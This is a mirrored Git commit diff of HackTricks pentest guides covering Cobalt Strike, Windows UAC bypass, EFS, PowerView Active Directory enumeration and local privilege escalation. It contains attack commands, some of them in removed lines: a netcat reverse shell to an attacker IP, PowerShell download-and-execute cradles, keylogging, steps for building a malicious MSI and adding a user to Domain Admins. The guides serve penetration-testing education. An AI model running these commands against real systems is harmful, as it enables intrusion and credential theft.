Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-24 21:53:54 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [#3368] No subject

Browse source
This commit is contained in:
CPol 2022-08-13 12:32:53 +00:00 committed by gitbook-bot
parent f1a0bdb8ae
commit 27a38dacf5
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
6 changed files with 73 additions and 111 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
c2/cobalt-strike.md
View file

@ -40,7 +40,6 @@ If you already has the file you want to host in a web sever just go to `Attacks
# Execute local .NET binary
execute-assembly </path/to/executable.exe>
# Screenshots
printscreen # Take a single screenshot via PrintScr method
screenshot # Take a single screenshot
@ -50,4 +49,7 @@ screenwatch # Take periodic screenshots of desktop
# keylogger
keylogger [pid] [x86|x64]
## View > Keystrokes to see the keys pressed
# Import Powershell module
powershell-import C:\path\to\PowerView.ps1
```

100
windows-hardening/authentication-credentials-uac-and-efs.md
View file

@ -1,4 +1,4 @@
# Authentication, Credentials, UAC and EFS
<details>
@ -16,13 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
## Security Support Provider Interface (SSPI)
# Security Support Provider Interface (SSPI)
Is the API that can be use to authenticate users.
The SSPI will be in charge of finding the adequate protocol for two machines that want to communicate. The preferred method for this is Kerberos. Then the SSPI will negotiate which authentication protocol will be used, these authentication protocols are called Security Support Provider (SSP), are located inside each Windows machine in the form of a DLL and both machines must support the same to be able to communicate.
### Main SSPs
## Main SSPs
* **Kerberos**: The preferred one
* %windir%\Windows\System32\kerberos.dll
@ -35,27 +36,27 @@ The SSPI will be in charge of finding the adequate protocol for two machines tha
* **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one)
* %windir%\Windows\System32\lsasrv.dll
#### The negotiation could offer several methods or only one.
### The negotiation could offer several methods or only one.
## Local Security Authority (LSA)
# Local Security Authority (LSA)
The **credentials** (hashed) are **saved** in the **memory** of this subsystem for Single Sign-On reasons.\
**LSA** administrates the local **security policy** (password policy, users permissions...), **authentication**, **access tokens**...\
LSA will be the one that will **check** for provided credentials inside the **SAM** file (for a local login) and **talk** with the **domain controller** to authenticate a domain user.
The **credentials** are **saved** inside the **process \_LSASS**\_: Kerberos tickets, hashes NT and LM, easily decrypted passwords.
The **credentials** are **saved** inside the **process **_**LSASS**_: Kerberos tickets, hashes NT and LM, easily decrypted passwords.
## Credentials Storage
# Credentials Storage
### Security Accounts Manager (SAM)
## Security Accounts Manager (SAM)
Local credentials are present in this file, the passwords are hashed.
### LSASS
## LSASS
We have talk about this. Different credentials are saved in the memory of this process.
### LSA secrets
## LSA secrets
LSA could save in disk some credentials:
@ -64,15 +65,15 @@ LSA could save in disk some credentials:
* Passwords for scheduled tasks
* More (password of IIS applications...)
### NTDS.dit
## NTDS.dit
It is the database of the Active Directory. It is only present in Domain Controllers.
### Credential Manager store
## Credential Manager store
Allows browsers and other Windows applications to save credentials.
## UAC
# UAC
UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user. When, the administrator executes some process **as administrator**, a **UAC elevation** is performed and if it is successfully completed, the privileged token is used to create the process.
@ -88,7 +89,7 @@ Then, to **bypass** the **UAC** (elevate from **medium** integrity level **to hi
You can **check** the _**Manifest**_ of a binary using the tool _**sigcheck.exe**_ from Sysinternals. And you can **see** the **integrity level** of the processes using _Process Explorer_ or _Process Monitor_ (of Sysinternals).
### Check UAC
## Check UAC
First you need to check the value of the key **EnableLUA**, if it's **`1`** then UAC is **activated**, if its **`0`** or it **doesn't exist**, then UAC is **inactive**.
@ -96,7 +97,7 @@ First you need to check the value of the key **EnableLUA**, if it's **`1`** then
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\
```
Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`** in the same entry of the registry as before (info from [here](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-gpsb/341747f5-6b5d-4d30-85fc-fa1cc04038d4)):
Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`**in the same entry of the registry as before (info from [here](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-gpsb/341747f5-6b5d-4d30-85fc-fa1cc04038d4)):
* If **`0`** then, UAC won't prompt (like **disabled**)
* If **`1`** the admin is **asked for username and password** to execute the binary with high rights (on Secure Desktop)
@ -105,20 +106,20 @@ Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`** in
* If **`4`** like `2` but not necessary on Secure Desktop
* if **`5`**(**default**) it will ask the administrator to confirm to run non Windows binaries with high privileges
Then, you have to take a look at the value of **`LocalAccountTokenFilterPolicy`**\
Then, you have to take a look at the value of **`LocalAccountTokenFilterPolicy`** \
If the value is **`0`**, then, only the **RID 500** user (**built-in Administrator**) is able to perform **admin tasks without UAC**, and if its `1`, **all accounts inside "Administrators"** group can do them.
And, finally take a look at the value of the key **`FilterAdministratorToken`**\
If **`0`**(default), the **built-in Administrator account can** do remote administration tasks and if **`1`** the built-in account Administrator **cannot** do remote administration tasks, unless `LocalAccountTokenFilterPolicy` is set to `1`.
#### Summary
### Summary
* If `EnableLUA=0` or **doesn't exist**, **no UAC for anyone**
* If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=1` , No UAC for anyone**
* If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)**
* If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=1`, UAC for everyone**
* If **`EnableLUA=0`**or **doesn't exist**, **no UAC for anyone**
* If ** `EnableLua=1` ** and **`LocalAccountTokenFilterPolicy=1` , No UAC for anyone**
* If ** `EnableLua=1` ** and **`LocalAccountTokenFilterPolicy=0` ** and ** `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)**
* If ** `EnableLua=1` ** and **`LocalAccountTokenFilterPolicy=0` ** and ** `FilterAdministratorToken=1`, UAC for everyone**
### UAC bypass
## UAC bypass
{% hint style="info" %}
Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on "Yes" when the UAS prompt appears
@ -136,11 +137,11 @@ net user %username%
whoami /groups | findstr Level
```
#### **Very** Basic UAC "bypass" (full file system access)
### **Very** Basic UAC "bypass" (full file system access)
If you have a shell with a user that is inside the Administrators group you can **mount the C$** shared via SMB (file system) local in a new disk and you will have **access to everything inside the file system** (even Administrator home folder).
{% hint style="warning" %}
{% hint style="info" %}
**Looks like this trick isn't working anymore**
{% endhint %}
@ -152,9 +153,9 @@ cd C$
dir \\127.0.0.1\c$\Users\Administrator\Desktop
```
#### UAC disabled
### UAC disabled
If UAC is already disabled (`ConsentPromptBehaviorAdmin` is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:
If UAC is already disabled (**`ConsentPromptBehaviorAdmin`**is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:
```bash
#Put your reverse shell instead of "calc.exe"
@ -162,35 +163,14 @@ Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
```
#### UAC bypass with token duplication
### UAC bypass exploits
* [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
* [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
#### UAC bypass with cobalt strike
The Cobalt Strike techniques will only work if UAC is not set at it's max security level
```bash
# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]
# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
```
#### UAC bypass exploits
You could also use some tools to **bypass UAC like** [**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like\_Source\Akagi\outout\x64\Debug\Akagi.exe\_) , you will need to know **which one you need.**\
You could also use some tools to **bypass UAC like** [**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like_Source\Akagi\outout\x64\Debug\Akagi.exe_) , you will need to know **which one you need.**\
You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening.
**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**.
#### More UAC bypass
### More UAC bypass
**All** the techniques used here to bypass AUC **require** a **full interactive shell** with the victim (a common nc.exe shell is not enough).
@ -200,7 +180,7 @@ You can get using a **meterpreter** session. Migrate to a **process** that has t
(_explorer.exe_ should works)
### Your own bypass - Basic UAC bypass methodology
## Your own bypass - Basic UAC bypass methodology
If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](windows-local-privilege-escalation/dll-hijacking.md).
@ -211,13 +191,13 @@ If you take a look to **UACME** you will note that **most UAC bypasses abuse a D
2. **IFileOperation**: Windows 10.
4. Prepare a **script** to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.
#### Another UAC bypass technique
### Another UAC bypass technique
Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**).
## EFS (Encrypted File System)
# EFS (Encrypted File System)
EFS works by encrypting a file with a bulk **symmetric key**, also known as the File Encryption Key, or **FEK**. The FEK is then **encrypted** with a **public key** that is associated with the user who encrypted the file, and this encrypted FEK is stored in the $EFS **alternative data stream** of the encrypted file. To decrypt the file, the EFS component driver uses the **private key** that matches the EFS digital certificate (used to encrypt the file) to decrypt the symmetric key that is stored in the $EFS stream. From [here](https://en.wikipedia.org/wiki/Encrypting\_File\_System).
EFS works by encrypting a file with a bulk **symmetric key**, also known as the File Encryption Key, or **FEK**. The FEK is then **encrypted** with a **public key** that is associated with the user who encrypted the file, and this encrypted FEK is stored in the $EFS **alternative data stream** of the encrypted file. To decrypt the file, the EFS component driver uses the **private key** that matches the EFS digital certificate (used to encrypt the file) to decrypt the symmetric key that is stored in the $EFS stream. From [here](https://en.wikipedia.org/wiki/Encrypting\_File\_System).
Examples of files being decrypted without the user asking for it:
@ -226,23 +206,25 @@ Examples of files being decrypted without the user asking for it:
The encrypted files using this method can be **tansparently access by the owner user** (the one who has encrypted them), so if you can **become that user** you can decrypt the files (changing the password of the user and logins as him won't work).
### Check EFS info
## Check EFS info
Check if a **user** has **used** this **service** checking if this path exists:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
Check **who** has **access** to the file using cipher /c \<file>\
You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files
### Decrypting EFS files
## Decrypting EFS files
#### Being Authority System
### Being Authority System
This way requires the **victim user** to be **running** a **process** inside the host. If that is the case, using a `meterpreter` sessions you can impersonate the token of the process of the user (`impersonate_token` from `incognito`). Or you could just `migrate` to process of the user.
#### Knowing the users password
### Knowing the users password
{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -258,3 +240,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

3
windows-hardening/basic-cmd-for-pentesters.md
View file

@ -441,9 +441,6 @@ xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)
# Get error messages from code
net helpmsg 32 #32 is the code in that case
```
### Listen address ACLs

6
windows-hardening/basic-powershell-for-pentesters/README.md
View file

@ -244,12 +244,6 @@ https://slaeryan.github.io/posts/falcon-zero-alpha.html
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
```
## Get permissions
```bash
Get-Acl -Path "C:\Program Files\Vuln Services" | fl
```
## OS version and HotFixes
```bash

51
windows-hardening/basic-powershell-for-pentesters/powerview.md
View file

@ -1,4 +1,4 @@
# PowerView
<details>
@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
The most up-to-date version of PowerView will always be in the dev branch of PowerSploit: [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
## Quick enumeration
### Quick enumeration
```bash
Get-NetDomain #Basic domain info
@ -52,10 +51,11 @@ Invoke-UserHunter -CheckAccess
Invoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, ActiveDirectoryRights | fl
```
## Domain info
### Domain info
```bash
# Domain Info
Get-Domain #Get info about the current domain
Get-NetDomain #Get info about the current domain
Get-NetDomain -Domain mydomain.local
Get-DomainSID #Get domain SID
@ -64,13 +64,19 @@ Get-DomainSID #Get domain SID
Get-DomainPolicy #Get info about the policy
(Get-DomainPolicy)."KerberosPolicy" #Kerberos tickets info(MaxServiceAge)
(Get-DomainPolicy)."SystemAccess" #Password policy
Get-DomainPolicyData | select -ExpandProperty SystemAccess #Same as previous
(Get-DomainPolicy).PrivilegeRights #Check your privileges
Get-DomainPolicyData # Same as Get-DomainPolicy
# Domain Controller
Get-NetDomainController -Domain mydomain.local #Get Domain Controller
Get-DomainController | select Forest, Domain, IPAddress, Name, OSVersion | fl # Get specific info of current domain controller
Get-NetDomainController -Domain mydomain.local #Get all ifo of specific domain Domain Controller
# Get Forest info
Get-ForestDomain
```
## Users, Groups and Computers
### Users, Groups and Computers
```bash
# Users
@ -118,7 +124,7 @@ Get-NetComputer -TrustedToAuth #Find computers with Constrined Delegation
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} #Find any machine accounts in privileged groups
```
## Logon and Sessions
### Logon and Sessions
```bash
Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
@ -128,7 +134,7 @@ Get-LastLoggedon -ComputerName <servername> #Get last user logged on (needs admi
Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)
```
## Shared files and folders
### Shared files and folders
```bash
Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers
@ -136,7 +142,7 @@ Find-DomainShare -CheckShareAccess #Search readable shares
Find-InterestingDomainShareFile #Find interesting files, can use filters
```
## GPOs & OUs
### GPOs & OUs
```bash
#GPO
@ -153,7 +159,7 @@ Get-NetOU #Get Organization Units
Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case)
```
## ACL
### ACL
```bash
Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs #Get ACLs of an object (permissions of other objects over the indicated one)
@ -163,13 +169,14 @@ Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUser
Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights #Get special rights over All administrators in domain
```
## Domain Trust
### Domain Trust
```bash
Get-NetDomainTrust #Get all domain trusts (parent, children and external)
Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found
Get-DomainTrustMapping #Enumerate also all the trusts
Get-ForestDomain # Get basic forest info
Get-ForestGlobalCatalog #Get info of current forest (no external)
Get-ForestGlobalCatalog -Forest external.domain #Get info about the external forest (if possible)
Get-DomainTrust -SearchBase "GC://$($ENV:USERDNSDOMAIN)"
@ -180,7 +187,7 @@ Get-DomainForeingUser #Get users with privileges in other domains inside the for
Get-DomainForeignGroupMember #Get groups with privileges in other domains inside the forest
```
## L**ow**-**hanging fruit**
### L**ow**-**hanging fruit**
```bash
#Check if any user passwords are set
@ -205,7 +212,7 @@ Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -Stealth
```
## Deleted objects
### Deleted objects
```bash
#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
@ -213,21 +220,21 @@ Invoke-UserHunter -Stealth
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
```
## MISC
### MISC
### SID to Name
#### SID to Name
```bash
"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName
```
### Kerberoast
#### Kerberoast
```bash
Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
```
### Use different credentials \(argument\)
#### Use different credentials (argument)
```bash
# use an alterate creadential for any function
@ -236,7 +243,7 @@ $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $S
Get-DomainUser -Credential $Cred
```
### Impersonate a user
#### Impersonate a user
```bash
# if running in -sta mode, impersonate another credential a la "runas /netonly"
@ -247,7 +254,7 @@ Invoke-UserImpersonation -Credential $Cred
Invoke-RevertToSelf
```
### Set values
#### Set values
```bash
# set the specified property for the given user identity
@ -260,10 +267,6 @@ Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=lo
Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain.local
```
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -279,5 +282,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

20
windows-hardening/windows-local-privilege-escalation/README.md
View file

@ -214,9 +214,9 @@ You can exploit this vulnerability using the tool [**WSUSpicious**](https://gith
## KrbRelayUp
This is essentially a universal no-fix **local privilege escalation** in windows **domain** environments where **LDAP signing is not enforced,** where the **user has self rights** (to configure **RBCD**) and where the **user can create computers in the domain.**\
****All the **requirements** are satisfied with **default settings**.
\*\*\*\*All the requirements \*\*\*\* are satisfied with **default settings**.
Find the **exploit in** [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp)
Find the **exploit in** [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp)\*\*\*\*
Even if the attack is For more information about the flow of the attack check [https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/](https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/)
@ -262,21 +262,6 @@ Read this tutorial to learn how to create a MSI wrapper using this tools. Note t
[create-msi-with-wix.md](create-msi-with-wix.md)
{% endcontent-ref %}
### Create MSI with Visual Studio
* **Generate** with Cobalt Strike or Metasploit a **new Windows EXE TCP payload** in `C:\privesc\beacon.exe`
* Open **Visual Studio**, select **Create a new project** and type "installer" into the search box. Select the **Setup Wizard** project and click **Next**.
* Give the project a name, like **AlwaysPrivesc**, use **`C:\privesc`** for the location, select **place solution and project in the same directory**, and click **Create**.
* Keep clicking **Next** until you get to step 3 of 4 (choose files to include). Click **Add** and select the Beacon payload you just generated. Then click **Finish**.
* Highlight the **AlwaysPrivesc** project in the **Solution Explorer** and in the **Properties**, change **TargetPlatform** from **x86** to **x64**.
* There are other properties you can change, such as the **Author** and **Manufacturer** which can make the installed app look more legitimate.
* Right-click the project and select **View > Custom Actions**.
* Right-click **Install** and select **Add Custom Action**.
* Double-click on **Application Folder**, select your **beacon.exe** file and click **OK**. This will ensure that the beacon payload is executed as soon as the installer is run.
* Under the **Custom Action Properties**, change **Run64Bit** to **True**.
* Finally, **build it**.
* If the warning `File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'` is shown, make sure you set the platform to x64.
### MSI Installation
To execute the **installation** of the malicious `.msi` file in **background:**
@ -1496,7 +1481,6 @@ If you manages to **hijack a dll** being **loaded** by a **process** running as
[**Watson**](https://github.com/rasta-mouse/Watson) -- Search for known privesc vulnerabilities (needs to be compiled using VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\
[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- Enumerates the host searching for misconfigurations (more a gather info tool than privesc) (needs to be compiled) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\
[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- Extracts credentials from lots of softwares (precompiled exe in github)**\
****[**SharpUP**](https://github.com/GhostPack/SharpUp) **-- Port of PowerUp to C#**\
[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- Check for misconfiguration (executable precompiled in github). Not recommended. It does not work well in Win10.\
[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Check for possible misconfigurations (exe from python). Not recommended. It does not work well in Win10.